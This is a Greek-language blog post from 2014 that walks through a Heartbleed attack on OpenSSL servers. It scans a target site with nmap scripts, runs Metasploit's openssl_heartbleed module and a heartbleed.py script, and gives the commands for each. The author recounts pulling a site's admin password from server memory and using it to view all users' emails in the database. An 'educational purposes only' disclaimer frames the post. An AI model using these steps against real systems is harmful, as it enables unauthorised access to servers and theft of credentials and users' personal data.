ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Παρασκευή, 18 Απριλίου 2014

Πως κανουμε επιθεση Heartbleed και πως κοιταμε αν μια σελιδα ειναι ευαλωτη σε αυτο







Τι θα χρειαστειτε;


1.Kali Linux
2.Heartbleed.py


Το Heartbleed ειναι μια ευπαθεια (bug) της  κρυπτογραφησης του Openssl

Εφαρμοζοντας το Heartbleed σαν επιτεθομενος μπορειτε να διαβασατε καποια τμηματα της μνημης του server και να δειτε διαφορες πληροφοριες οπως κωδικους χρηστων κτλ.

Στην κατω εικονα θα δειτε μια πολυ απλη εξηγηση πως δουλευει αυτη η ευπαθεια



Τωρα για να δουμε αν μια σελιδα ειναι ευαλωτη στο Heartbleed την ανιχνευουμε με script στο nmap
οποτε κατεβαζουμε tls.lua  και ssl-heartbleed.nse
οταν κατεβασουμε και τα 2 αρχεια τα μεταφερουμε στην επιφανεια εργασιας
ανοιγουμε ενα τερματικο και γραφουμε
mv /root/Desktop/tls.lua /usr/share/nmap/nselib
mv /root/Desktop/ssl-heartbleed.nse /usr/share/nmap/scripts
τωρα γραφουμε
nmap --script-updatedb
και ειμαστε ετοιμοι να δουμε αν η ιστοσελιδας μας ειναι ευαλωτη στο heartbleed

nmap -sV --script=ssl-heartbleed.nse σελιδα.com

και θα σας εμφανισει αν η σελιδα ειναι ευαλωτη στο heartbleed

πχ 
 

οπως βλεπετε η σελιδα ειναι ευαλωτη οποτε για να εκμεταλευτουμε αυτη την αδυναμια
γραφουμε στο τερματικο msfupdate για να αναβαθμιστει το metasploit
οταν τελειωσει το metasploit γραφουμε
msfconsole
use auxiliary/scanner/ssl/openssl_heartbleed


και γραφουμε
set VERBOSE 1
set RHOSTS σελιδα η ip της σελιδας
set HEARTBEAT_LENGTH 65535 * η 1024


και τελος

run



βλεπουμε οτι δεν μας εμφανισε καμια ιδιαιτερη πληροφορια

τωρα για να μην μπενουμε σε ολη αυτη την διαδικασια με το metasploit
κατεβαζουμε το heartbleed.py εδω

οταν κατεβει το βαζουμε στην επιφανεια εργασιας και
γραφουμε σε ενα τερματικο
python /root/Desktop/heartbleed.py σελιδα.com

και βλεπουμε οτι μας εδειξε τον κωδικο admin για την σελιδα



και απο εκει και περα αφου πηρα τα κριτηρια συνδεσης του admin
μπορω να συνδεθω στην βαση δεδομενων


και να δω πχ ολα τα email των χρηστων


Για να δειτε αν μια σελιδα ειναι ευαλωτη στο heartbleed πατηστε εδω

Το Heartbleed ειναι μια απο τις μεγαλυτερες ευπαθειες που μπορουσε να γνωρισει το internet.

Αν θελετε να δοκιμασετε αυτη την επιθεση δοκιμαστε το σε δικος σας συστημα οπως τα kali linux για οδηγιες εγκαταστασης κατεβαστε εδω


Δεν υπάρχουν σχόλια: